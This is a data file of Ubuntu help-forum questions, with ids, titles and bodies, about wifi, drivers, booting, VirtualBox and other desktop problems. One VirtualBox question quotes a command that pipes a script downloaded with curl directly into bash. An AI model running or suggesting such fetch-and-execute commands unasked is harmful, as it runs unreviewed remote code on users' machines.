380547	simple cli to append one file to the end of another	if i have two text files , file1.txt.and file2.txt , how do i append the contents of file2.txt to file1.txt ( without overwriting file1.txt ) using a simple command-line ?
380549	videocard driver , flash crash and low pixels ?	some days ago i have been used win 7 , everything works fine and have n't problems that could n't be solved ! at the time installed ubuntu desktop 12.04 ! first appearances was extremely positive , look good , have awesome speed of work , like terminal and multifunctionality , especialy installing mode , but : in web pages where used flash content , usualy crash ! in flash game crash too ! pixels look like was washed ! i looked at system properties and noticed : vga card : unknown regime : simple i find something approach to me : 12.10 video card driver : < empty > experience : limited after that : vga card vesa : rs690 regime : simple what that mean ? i do n't have driver or is n't good ? if i run : lspci | grep vga then : 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs690m [ radeon xpress 1200/1250/1270 ] os : ubuntu 24.04 [ x64 ] toshiba satellite a300d can somebody explain please how to fix it ?
380550	( xubuntu ) how to set the wallpaper using the command line ?	i 've done a lot of googling but have n't been able to find a solution to my problem . i am a teacher and i 'm using xubuntu on some student computers . i have everything locked down pretty good , but i ca n't figure out how to restrict users from changing the wallpaper without having to out the whole machine in kiosk mode . i do n't care if they change it during their work session , but i would like to create a crontab that resets back to the original .png at reboot . i 'm hoping for a simple cron entry but i 'm willing to ease into the world of shell scripts if that 's what it takes . any ideas ?
380551	booting ubuntu 13.04	i am currently trying to boot up ubuntu 13.04 . whenever i boot it up though , i get a console-like screen that says this : welcome to ubuntu 13.04 ( gnu/linux 3.8.0-19-generic x86_64 ) *documentation : https : //help.ubuntu.com/ ubuntu @ ubuntu : ~ $ i would like to know what to type in here
380552	ubuntu 12.04 lan settings after changing isp and modem : the network path was not found !	there is probably a very simple answer to this but it has me stumped . i have a ubuntu 12.04 machine on a windows lan . previously i could find the shared folders on the system by using \\servername\sharename . recently i changed isp 's and as a result also the dhcp server/modem . the old network was 10.0.0.1 , the new one is 192.168.0.1 . all the settings seem correct on the ubuntu machine , and the dhcp has assigned the ip of 192.168.0.21 , which i can ping without any loss of data . however when i try to connect using \\servername\sharename i get the network path was not found ! i can access the internet from the ubuntu machine without any problems , plus i can see and navigate to as well as open shared folders and files on all the windows machines on my lan . any suggestions ?
380554	wifi now not working after using advice	my wifi is now disabled after entering a terminal command found on this site that was suggested as a solution to a slow wifi on 12.04 . command was sudo modprobe -r iwlwifi & & sudo modprobe iwlwifi 11n_disable=1 how can i undo this modification ?
380558	compiling c source file without .c suffic	let hello_world be a valid c source file . when i try to compile i get gcc hello_world // hello_world : file not recognized : file format not recognized i know i could rename to have .c suffix , but if i do n't , does gcc support compiling file without .c suffix ?
380559	nvidia driver install issue w/ 12.04 quantal - shall i follow 12.10 instructions ?	spent more than a week now , trying to install nvidia and blender on my ubuntu 12.04 i7 processor with geeforce 640. following several instruction here and at other forum still i am in the middle of nowhere , did so many fresh install too . i found some forum it says how to install nvidia driver on ubuntu 12.10 quantal starting from fresh installation . i was wondering that it will work for my version of ubuntu 12.04 . it also claims that the linux-headers-generic package isnât installed by default i must run this command to update . sudo apt-get update sudo apt-get install linux-headers-generic and continue ... .. my question is that is it safe to run those command on my machine starting from fresh installation ? for more detail here is the link which i want to follow . http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ # comment-116851 now i have installed blender and nvidia using these commands . but dose not work . sudo apt-get install nvidia-current-updates sudo add-apt-repository -y ppa : irie/blender sudo apt-get update sudo apt-get install blender sudo apt-get install nvidia-cuda-toolkit thank you hope this is clear and i get some help .
380566	why is system monitor not starting ?	i have ubuntu 13.10 live disc system and for some reason i ca n't start the system monitor at the moment . i know it worked before , some five days ago , and since this is a live disc system there 's no chance in the world that i somehow could have screwed up any system configuration or anything . i boot it with default settings and everything . since it is a live disc system i could just reboot and see if it starts working again . but i use it for testing and i have all my programs and everything set up now ( i did everything the same way as i did five days ago ) and for this reason i refrain from rebooting because i would have to do everything all over again . i am also eager to learn why the hell it is not starting ? this is not reliable , a system component or a program ( whatever ! ) that sometimes starts and sometimes it just wont budge . ridiculous ! this is how i start system monitor : i simply click on the ubuntu button in the upper left corner to open dash , type in `` monitor '' and then click on `` system monitor '' . what happens when i do that : the icon for system monitor appears on the launcher but no application window shows up , and if i click the icon on the launcher it does n't do anything . i tried to start it from terminal and got following error . ubuntu @ ubuntu : ~ $ sudo gnome-system-monitor ** ( gnome-system-monitor:8143 ) : warning ** : selinux was found but is not enabled . so what now ? ... do i enable selinux ? how ? why ? update 1 - installing selinux i found this in ubuntu wiki . selinux can be enabled in ubuntu by installing the `` selinux '' meta-package , which will make the needed changes to the system , and install the tresys policies for ubuntu : sudo apt-get install selinux after installation , you will be prompted to reboot the system to label and activate selinux . why would i want to install it if it says it 's already installed ? are there no instructions for only enabling it ? is there no way of enabling it without installing or re-installing it , and/or rebooting the computer ? is there no method of enabling it without loosing my current open processes and programs and stuff ? and if it 's already installed , why was it not enabled in the first place ? ...
380574	thumb drive install not recognizing my computer 's hdd	i have borked my install several times now , and have had to format and reinstall several times now . something happened on the last go that i did n't realize until now . for whatever reason , ubuntu decided to format and install to my external hard drive . i had secured my hdd before this . now , it wo n't boot ( even though it says the name of the drive is ubuntu in my boot utilities ) . when i try to install ubuntu from my thumb drive , the utility does n't recognize my hdd and wo n't install anywhere . this is very frustrating . the os is running slowly off of my external , and i do n't want to go back to windows . i just want to format my hdd and start with a fresh install . please let me know if you need further information to help with this fix . thank you in advance .
380577	dell lattitude e5400 cd burner not working	when i go to burn a audio cd it says error . i 'm not even sure if i have the drivers for it . can someone help ? i 'm on 13.10 by the way .
380582	skype login can not be executed on ubuntu 13.10	i got ubuntu 13.10 release a couple of days back , and there is some bugs like allways with every new distro version after realisation . but anyway , that bugs are not really any problem or something hard to fix , but only one problem , that i can not solve is my skype . so problem has the following diagnosis : opening skype every time is as opening it for a first time , when you are prompted to accept license and login . i get this even after i open it for first time after starting machine , or right after restarting it . i go to login screen , type my credentials , and i get message : we cant open skype ! you are already signed in on this computer . please sign out and try again . how can i solve this ? any help will be really useful as i am person who lives 3000km from home and use skype every day .
380585	is it possible to have secure lts in ubuntu ?	i thought that i would be able to enable & support php5-suhosin in a 12.x server by enabling the âuniverseâ repo but now understand that the stuff in universe is n't supported for ubuntu 's lts duration . can i get some clarification on that ?
380586	wireless is disabled by hardware switch . wifi does n't work ! ( hard blocked : yes , lenovo y580 , ubuntu 13.10 )	i have a problem with wifi on my laptop lenovo ideapad y580 ( bought with pre-installed windows 7 home premium 64bit ) . after uninstall win7 and install ubuntu 13.10 64bit ( where normal wired internet is working ) wifi does n't work ! wireless is disabled by hardware switch . rfkill list all martin @ martin-y580 : ~ $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes i checked the bios , and the wireless card is enabled there . fn + f5 did n't work , and my computer does n't have a physical switch on the outside , which is why i asked here . rfkill unblock all change only soft blocks , and sudo ifconfig wlan0 up shows me this : siocsifflags : operation not possible due to rf-kill . some specifications : lshw -class network martin @ martin-y580 : ~ $ lshw -class network *-network disabled description : wireless interface product : centrino wireless-n 2200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : c4 serial : 9c:4e:36:4c:9f:7c width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-13-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:43 memory : d3500000-d3501fff lspci martin @ martin-y580 : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 ide interface : intel corporation 7 series chipset family 4-port sata controller [ ide mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 00:1f.5 ide interface : intel corporation 7 series chipset family 2-port sata controller [ ide mode ] ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gtx 660m ] ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 08 ) 03:00.0 network controller : intel corporation centrino wireless-n 2200 ( rev c4 ) 04:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 04:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 04:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 04:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 30 ) uname -a martin @ martin-y580 : ~ $ uname -a linux martin-y580 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux` how can i solve this issue ?
380591	glx missing on display `` :0.0 '' . ubuntu 12.04	i have issue with my nvidia geeforce 640 on i7 processor how can resolve this issue ? here are some ouputs : shams @ ubuntu : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system shams @ ubuntu : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation device 0fc1 ( rev a1 ) shams @ ubuntu : ~ $
380592	no os found while trying to install ?	i currently have a problem , i have the usb version of ubuntu..and if i try to install it , it says i have no os installed ! and i do n't know how to install it without erasing windows 8 ! any help would be greatly appreciated .
380595	looking at serial port traffic	i 'm a windoze guy so i 'm kinda lost here . usually when i want to see what 's happening on a serial port ie com 1 , i fire up putty and point it at com 1 and i 'm done . in linux i do n't have putty . more specifically i have an arm board talking on a usb cable to /dev/ttyacm0 and i want to see what it is sending . i 've made a little program in qt that reads the /dev/ttyacm0 and it is working to a certain degree but some data i 'm getting looks wack so i want to confirm it . when i plug the arm board into the win7 laptop it does n't know what to do with it so i ca n't even use putty . how can i get putty or equivalent application in ubuntu ?
380597	error when starting conf unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory	i 've made a conf file that runs a nodejs server as a service 'test.conf ' if i run this file with sudo it works perfectly fine . i need to run this file without sudo because i made a 'post-receive ' file in my git repository that is inteded to restart the nodejs server by using start test.conf when i use this command without sudo i get the following error : start : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory is there another way of doing what i want done or a solution to this error ?
380599	ubuntu 13.10 booting from uefi but not legacy	i am using a pc wich has options for booting from uefi and secure boot , i 'm trying to install ubuntu in legacy wiping my windows 8 install , but it stays at a black screen saying sylinux 4.20 ... it boots in uefi with secure boot enabled , just questioning if i can install it that way . i would like to use legacy . how can solve this ?
380603	printer ( epson wf-3540 ) driver install consistently freezes on 13.10 but not 12.04	when i try to add my printer , the system detects the driver but freezes partway through installing it . how can i add the printer ? some details : the printer is being connected over wifi and works fine with other computers- including a older laptop running ubuntu 12.04 . the printer is an epson wf-3540 . i 'm running 13.10 . i 've attatched a picture of what happens .
380604	down arrow not working	down arrow is not working in ubuntu but it works well in windows xp..i have two os installed in parallel.i have tried re configuring keyboard but it still does n't work . can anyone help me with this problem .
380606	virtualbox bridged adapter - only one network interface listed in /etc/network/interfaces	i 've been trying to configure another version of linux in virtualbox , and i want to connect it to my network using the bridged adapter option by bridging it to my wifi . its been taking me a while to figure out how to do that , but on the way i needed to edit my /etc/network/interfaces file ( on my host system ) . there , i saw that it looks like i only have one interface listed : auto lo iface lo inet loopback from what i understand , which to be honest is n't much , i should have at least 3 : the loopback , eth0 , and the wifi . when i run ifconfig i get , the three interfaces , though again there 's an abnormality : my wifi interface is n't named wlan0 but rather eth1 . the output is ( censored a little for internet safety ) : eth0 link encap : ethernet hwaddr -- : -- :6f:70 : c3 : f5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0x2000 eth1 link encap : ethernet hwaddr -- : -- :00 : df : bf : a2 inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :7ae4 : ff : fedf : bfa2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:408173 errors:41 dropped:0 overruns:0 frame:534242 tx packets:246382 errors:32 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:464348078 ( 464.3 mb ) tx bytes:35404570 ( 35.4 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8896 errors:0 dropped:0 overruns:0 frame:0 tx packets:8896 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:740380 ( 740.3 kb ) tx bytes:740380 ( 740.3 kb ) i have n't messed around much with networking , so i do n't think this is something i did . why are my interfaces so strange ? if i add an eth0 and wlan0 , what will happen to the interfaces that ifconfig is already showing ? where are those located ? the instructions i 'm following that led my to look at /etc/network/interfaces are here : http : //codesupply.net/content/setup-bridged-networking-virtualbox-ubuntu-1110 though i 'm running ubuntu 12.04 . also , my wifi is working on my host os , and if i use nat it works on my guest os , just not when i use the bridge adapter .
380608	two internet connections virtualbox and host machine : how to do it ?	i have ubuntu installed on my hdd . then i have a virtual machine ( virtualbox 4.2.18 ) windows 7 . there are two wireless adapters ( wlan0 and wlan1 ) . also two wireless ap ( ap1 and ap2 ) . now i want to connect the host machine ( linux ) using wlan1 to ap1 , and then i want to connect the virtual machine ( windows 7 ) using wlan0 to ap2 . can anybody help me how to do it ?
380609	anyone has successfully installed cuda 5.5 on ubuntu 13.10 64-bit ?	i tried to install cuda 5.5 through deb routine , following the steps in nvidia website , using the deb file for ubuntu 12.10 ( the latest version i could found on nv website ) , the installer fail to begin , tell me there are some dependences issues : the following packages have unmet dependencies . cuda : depends : cuda-5-5 ( = 5.5-22 ) but it is not going to be installed . e : unable to correct problems , you have held broken packages .
380610	how do i alter the keyboard volume control to be less sensitive ?	how do i alter the keyboard volume control to be less sensitive ? i have a logitech media keyboard 600 which has a wheel for volume control . i find the amount the volume changes between 'clicks ' is too high . it 's set much more for a button press of volume change , not a scrolling wheel . thanks , noki
380611	bootloader does n't show other os post-install of ubuntu	so i just have a weird error that i think is associated with ubuntu 's bootloader not recognizing solaris . what happened was i installed solaris 11 , and then installed ubuntu alongside , and when i partitioned the drive there was x gb used ( for solaris ) , and then y gb free or whatever , but in the x gb used , it said `` unknown '' . after the installation ( 13.04 if that 's relevant ) , my ability to boot solaris has been gone , but i know it 's still on the disk . the menu simply never appears when i boot up the machine ; it simply boots ubuntu immediately . any ideas ?
380612	dell studio 1440/14z p8700 2.53ghz core i5 sandy bridge	i loaded ubuntu 13.04 on a dell studio 1440/14z p8700 2.53ghz core i5 sandy bridge cpu , 5gb ram issues : software update does not work - irrespective of which repository no wireless capability - broadcom corporation : wireless 1520 half-size mini pcie card on boot-up the screen shows ubuntu 14.04 know ubuntu software is absent from ubuntu software center any help will be appreciated .
380613	odd error message when i open terminal	when i open terminal , i get the following error message : no command 'expert ' found , did you mean : command 'expect ' from package 'expect ' ( main ) expert : command not found no command 'expert ' found , did you mean : command 'expect ' from package 'expect ' ( main ) expert : command not found and then it displays the typical nathan @ nathan-hp-pavilion-dv6-notebook-pc : ~ $ what did i do to cause this , or at least , how do i fix this ? i use terminal a lot so this has been getting annoying .
380617	install mysql proxy via ubuntu terminal	how do i install mysql proxy via ubuntu terminal http : //dev.mysql.com/doc/refman/5.1/en/mysql-proxy-install-binary.html
380618	is there a way to make tshark not truncate lines ?	i 'm trying to inspect http conversation : tshark -r ~/1.pcap -r http -v | less but here and there i see these [ truncated ] things : accept-language : en-us , en ; q=0.8\r\n [ truncated ] cookie : phpsessid=u0c1ucgkd0463aglsroah7sbj0 ; __utma=32894956.1912734460.1379368266.1384280091.1384385020.24 ; __utmc=32894956 ; __utmz=32894956.1379368266.1.1.utmcsr= ( direct ) |utmccn= ( direct ) |utmcmd= ( none ) ; a=ad44ef895a8c9f35cac4 \r\n ... < div class= '' clear_fix '' > \n [ truncated ] < div class= '' pva_title_text fl_l '' title= '' \324\356\362\356\343\360\340\364\350\350 \361\356 \361\362\360\340\355\350\366\373 \300\360\362\270\354\340 '' > \324\356\362\356\343\360\340\364\350\350 \361\356 \361\362\360\340\3 < div class= '' pva_camera fl_r '' > 2 < /div > \n is there a way to make it not truncate text ? are there any other console programs who can do it correctly , provided they can decode gzipped content ?
380619	how to install broadcom lp-phy drivers ?	my dell inspirion is equipped with a broadcom 14e4 4315 low-power wifi card . i recently installed ubuntu 12.04 on my system with hopes of making it my number one os . when i booted it up , my wifi card did n't show up . i tried installing the additional drivers that come with the driver via : settings > additional drivers . but before it installs , it always says it fails and gives me a log file reference . i have already tried unblocking the rfkill list and it is neither hard or soft blocked . i also tried another tutorial from the ubuntu site on how to install the drivers and installed the broadcom-sta-source and broadcom-sta-common packages , and this did n't help . i really need to have my wireless card working for this to be a productive machine . how can i solve this problem ?
380621	problem in chromium browser logging	i 'm running xubuntu 12.04 . it originally was lubuntu 12.04 , then i installed xubuntu-desktop . i 'm still using chromium as my browser because it 's running on a netbook . everything works really well except for one small annoyance . i have other users who use the system now and then . when i run chromium , it works as you would expect . when any other user runs it , chromium starts a terminal window to show output . this is confusing for some of them . i 've checked their /home directories and they seem identical to mine wrt chromium ( i.e . they have a .cache and all its subdirectories are the same as mine ) . the shortcuts all launch chromium with the same command : /usr/bin/x11/chromium-browser at first i thought it was just because they did n't have access to /var/log . but now i 'm not so sure . it does n't look like chromium logs to that directory ; it must log to the user 's home directory , though i have n't found the output from my session yet . how do i get chromium to work the same for my other users as it does for me ? specifically , no terminal window at launch and logging to their home directories .
380623	set wifi txpower from /etc/network/interfaces	i am trying to configure my wifi to reliably connect at start-up on a headless device . i currently have done this with a simple entry in /etc/network/interfaces , along the lines of auto wlan0 iface wlan0 inet static wpa-ssid < my ssid > wpa-psk < my psk > address < address > netmaks < netmask > gateway < gateway > now i also need to set txpower ( which also requires me to set the region ( reg ) as i understand it ) . i can do this from the command line with iw reg set ... and iwconfig wlan0 txpower ... . however , what i need is for these values to be reliably set on startup . i have looked in what i believe is the documentation for configuring wifi in /etc/interfaces , which is /usr/share/doc/wpasupplicant/readme.modes.gz , but this does not seem to have any information on setting transmit power . how can i achieve this ?
380624	how do i install playonlinux from the repository ?	i am getting following error while installing software from repository . can anyone help me on this ... administrator @ administrator-optiplex-380 : ~ $ sudo apt-get install playonlinux [ sudo ] password for administrator : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package playonlinux
380626	hide a .desktop file on the desktop [ ubuntu 13.04 ]	i have made a .desktop launcher for my dock . i try to put a `` . '' after the name of file , but he doesnt hide . exemple : .firefox.desktop if i delete it , my firefox icon in my dock ca n't be open . i have to hide my desktop file , thanks !
380627	not booting after installing any package	i have downloaded lubuntu-13.04-desktop-amd64.iso and did the following , but the resulting filesystem.squashfs does n't boot . unsquashfs filesystem.squashfs schroot -c squashfs-root apt-get install vim exit mksquashfs squashfs-root/ filesystem.squashfs these steps execute without problems , but the resulting filesystem.squashfs does n't boot . it shows a blank screen after showing the lubuntu splash image , while booting . please let me know why . thanks .
380629	how do i use game conquer on 12.04 for dragons of atlantis ( online )	i 'm playing dragons of atlantis online . i was looking into using cheat engine and i was told that ubuntu has an option called `` game conqueror '' . i 've installed the game conqueror with no issues . unfortunately , there are n't any instructions or help included . has anyone else had experience with this application and could offer some help ? thanks .
380633	wifi keeps dropping on lenovo u430 touch - running ubuntu 13.10	recently i installed ubuntu 13.10 on my new lenovo u430 touch alongside windows 8.1 now wifi keeps dropping every few mins , i disable and enable wifi and then it works again , but dropped after a few mins again . i checked many forums and none of the suggestions seem to work . this problem does not happen on win 8 though . here is the output of sudo lspci -nnk | grep -b4 network subsystem : lenovo device [ 17aa:3978 ] 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 10 ) subsystem : lenovo device [ 17aa:3801 ] kernel driver in use : r8169 02:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 ) and the output of dmesg | tail -n 50 as soon as the wifi stopped [ 6493.935237 ] warning : cpu : 0 pid : 6423 at /build/buildd/linux-3.11.0/net/mac80211/util.c:1538 ieee80211_reconfig+0x1234/0x13f0 [ mac80211 ] ( ) [ 6493.935240 ] modules linked in : hid_generic hid_multitouch uvcvideo videobuf2_vmalloc videobuf2_memops usbhid videobuf2_core videodev hid btusb parport_pc ( f ) ppdev ( f ) bnep rfcomm bluetooth snd_hda_codec_hdmi snd_hda_codec_realtek joydev ( f ) arc4 ( f ) x86_pkg_temp_thermal coretemp kvm ( f ) nls_iso8859_1 ( f ) crct10dif_pclmul ( f ) crc32_pclmul ( f ) ghash_clmulni_intel ( f ) aesni_intel ( f ) aes_x86_64 ( f ) lrw ( f ) gf128mul ( f ) glue_helper ( f ) ablk_helper ( f ) cryptd ( f ) iwlmvm mac80211 snd_hda_intel iwlwifi snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) cfg80211 snd_page_alloc ( f ) i915 snd_seq_midi ( f ) microcode ( f ) snd_seq_midi_event ( f ) psmouse ( f ) snd_rawmidi ( f ) snd_seq ( f ) serio_raw ( f ) snd_seq_device ( f ) drm_kms_helper wmi snd_timer ( f ) drm ideapad_laptop sparse_keymap snd ( f ) lpc_ich i2c_algo_bit mei_me mei soundcore ( f ) video ( f ) intel_smartconnect mac_hid lp ( f ) parport ( f ) ext2 ( f ) ahci ( f ) libahci ( f ) r8169 mii ( f ) [ 6493.935362 ] cpu : 0 pid : 6423 comm : kworker/0:4 tainted : gf w 3.11.0-13-generic # 20-ubuntu [ 6493.935365 ] hardware name : lenovo 20270/cherry 4a touch , bios 7ccn32ww 09/04/2013 [ 6493.935380 ] workqueue : events ieee80211_restart_work [ mac80211 ] [ 6493.935382 ] 0000000000000009 ffff880008e69d40 ffffffff816e54ba 0000000000000000 [ 6493.935401 ] ffff880008e69d78 ffffffff81061dbd ffff880158b8e800 0000000000000003 [ 6493.935407 ] 00000000ffffffea ffff880157498600 0000000000000004 ffff880008e69d88 [ 6493.935413 ] call trace : [ 6493.935419 ] [ ] dump_stack+0x45/0x56 [ 6493.935427 ] [ ] warn_slowpath_common+0x7d/0xa0 [ 6493.935454 ] [ ] warn_slowpath_null+0x1a/0x20 [ 6493.935474 ] [ ] ieee80211_reconfig+0x1234/0x13f0 [ mac80211 ] [ 6493.935492 ] [ ] ieee80211_restart_work+0x87/0xa0 [ mac80211 ] [ 6493.935509 ] [ ] process_one_work+0x17c/0x430 [ 6493.935514 ] [ ] worker_thread+0x11c/0x3c0 [ 6493.935520 ] [ ] ? manage_workers.isra.24+0x2a0/0x2a0 [ 6493.935528 ] [ ] kthread+0xc0/0xd0 [ 6493.935549 ] [ ] ? kthread_create_on_node+0x120/0x120 [ 6493.935554 ] [ ] ret_from_fork+0x7c/0xb0 [ 6493.935561 ] [ ] ? kthread_create_on_node+0x120/0x120 appreciate help in resolving it . ps . i am a new user for ubuntu and have added the details i seem to think might help identify the problem .
380634	tdb failed to establish db connection : could not find driver	my mysql is working fine with my system until i had to re-install mysql using my terminal . since then i always get the error tdb failed to establish db connection : could not find driver . i have pdo_mysql in my extension . i am at a loss . my connection to my database are all configured correctly . i even tried to replace the current system with my old system that used to connect to database before . i am new to ubuntu , if anyone could please help me . here 's my database connection code : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < sqlmapconfig > < connection class= '' tdbconnection '' connectionstring= '' mysql : host=localhost ; dbname=dlti ; charset=utf8 '' username= '' root '' password= '' '' / > < /sqlmapconfig >
380639	how to control mouse cursor using c ?	as in windows there is a function setcursorpos in windows.h for controlling cursor position . what is the way to do this in ubuntu ?
380640	ubuntu 13.10 freezes at times ; *error* stuck on render ring	my ubuntu 13.10 laptop freezes relatively frequently , after i recently installed it . it is most common while i am playing minecraft , but i have also had it happen at other times . i think it may be a memory leak , but i thought the computer should not freeze when the ram is used . from time to time , i will also get messages in the tty about an error . one i just got [ 4407.784295 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring . i believe there was another line below it , but i was running htop at the time and the line cuts off after [ 4407 i am on an asus computer with 4 gb of ram and 4 gb swap space . i am not new to linux nor the command line , but this is completely new to me . i will offer any additional information that you need . thank you for any help .
380641	ubuntu server 13.10 is not starting	i have installed ubuntu server 13.10 in a i3 machine using a pen drive . have installed grub boot loader to the master record , i have removed all the media devices like cd , pen drive but after restarting its just showing a single cursor .
380642	why can i not upgrade for 12.04 to 13.04 ?	when i go to upgrade my software the task manager says 0 upgraded 0 newly installed and 0 not upgraded . also i am using crouton so that my chromebook may support it . i am using xfce .
380646	how to stop user from login ?	i have a ubuntu pc.i am the root user and have 3 other users too with normal attributes . how can i stop one of the user from login temporarily ? with these factors , do n't delete the user no attributes change a login rejection & a message to him c an be look constructive action . how can i do that ? thank you .
380649	error while installing extension pack on oracle vm virtualbox	i have installed oracle vm virtualbox on ubuntu 13.10 and i am trying to install ie8 on windows 7 from terminal as suggested in this answer . i am running following command on terminal : $ curl -s https : //raw.github.com/xdissent/ievms/master/ievms.sh | ievms_versions= '' 8 '' bash however , after downloading the appropriate package oracle vm virtualbox extension pack , when it is getting installed , i am receiving following error on terminal . installing oracle vm virtualbox extension pack from /home/ninad/.ievms/oracle_vm_virtualbox_extension_pack-4.3.2.vbox-extpack 0 % ... progress state : ns_error_failure vboxmanage : error : failed to install `` /home/ninad/.ievms/oracle_vm_virtualbox_extension_pack-4.3.2.vbox-extpack '' vboxmanage : error : the installer failed with exit code 1 : vboxmanage : error : ( gksu:8005 ) : gdk-critical ** : ia__gdk_window_set_opacity : assertion 'gdk_is_window ( window ) ' failed vboxmanage : error : details : code ns_error_failure ( 0x80004005 ) , component extpackmanager , interface iextpackmanager vboxmanage : error : context : `` int handleextpack ( handlerarg* ) '' at line 1143 of file vboxmanagemisc.cpp error : failed to install oracle vm virtualbox extension pack from /home/ninad/.ievms/oracle_vm_virtualbox_extension_pack-4.3.2.vbox-extpack , error code ( 1 ) please guide me how do i continue the installation of ie8 on windows7 in oracle vm virtualbox . update ( 23 nov 2013 ) : tried method as suggested by @ rajagenupula . however , virtualbox says that the extension pack is already installed with the same version . do you want to reinstall it ? i think this may be bacause somewhere amongst my multiple attempts , it has already been installed . i do not think reinstalling is going to help here . ran command $ sudo apt-get install unar to install unar package . without this , i was getting error : linux support requires unar ( sudo apt-get install for ubuntu/debian ) now trying to download 716 mb file of vm for ie8 by the same curl command for ie8 vm .
380650	in ubuntu , is there an application like `` huawei mobile partner '' for broadband connections ?	i want to know that is there an application in ubuntu which is like huawei mobile partner . that application should provide : display bandwidth sms facility . make connection and disconnection through that application . show used data volume per given period .
380651	how to disable storage media access from usb and keep using usb keyboards mouses and datacards ?	please help me to disable storage media access from usb and in meanwhile using the usb port i want use keyboards mouses and datacards . i have done it in windows is it possible in ubuntu 12.04 . every command i tried disables the usb access to all devices data-cards , storage media , keyboards , mouses but not to specfic storage media only . please help thanks in advance regards akhil s nath
380652	is it possible to install ubuntu on my samsung galaxy s duos ( gt-s7562 )	i am using samsung galaxy s duos smartphone with android v4.0 os . how do i install ubuntu on my phone ? what are the requirements ? can it work along with android just like ubuntu works along with windows 7 on laptop and desktop ?
380658	password for a new ubuntu install from a flash drive	i am trying to install ubuntu from a flash drive . it is a new install so i type in a user name and a password but it says it does n't match ?
380660	why does n't my wallpaper show up	i 'm using ubuntu 13.10 x64 , i do n't know why but my wallpaper does n't show up . how can i fix this problem ? thanks . i run this command : gsettings set org.gnome.settings-daemon.plugins.background active true and now i can see my wallpapter , but the system runs very slow , please see the top command : it seems like the ibus using a lot of cpu recourse , is this normal ?
380661	wifi suddenly wo n't connect ? ( ethernet still works )	i have windows 7 and ubuntu 13.10 dual booted on my laptop , a toshiba satellite l505 . i have been using this version of ubuntu on my laptop for about a month or so and installing and uninstalling different versions to see what my laptop could handle and what appealed to me . so far i have n't had any major problems from this installation and this is the first time this problem came up . tl ; dr : wifi stopped working in the middle of use . ethernet still works . computer lists available wirless connections , tries to connect to app , displays disconnected from network message after about 30 seconds of trying to connect . the problem started while i was playing a game called pokemmo . the game has n't caused problems before either . during the game , i suddenly lost wifi connection at a part where i could n't exit the game , so i had to restart the system . i did not do a hard shutdown . i did n't receive any errors during boot . wifi did not connect at logon screen as it usually does . logged in , laptop is automatically trying to connect to ap , displays disconnected from host after about 30 seconds , tries to reconnect , same thing happens , process repeats . verified security type and password are set correctly . tried to use command : sudo vi /etc/network/interfaces i am not familiar with how to edit this 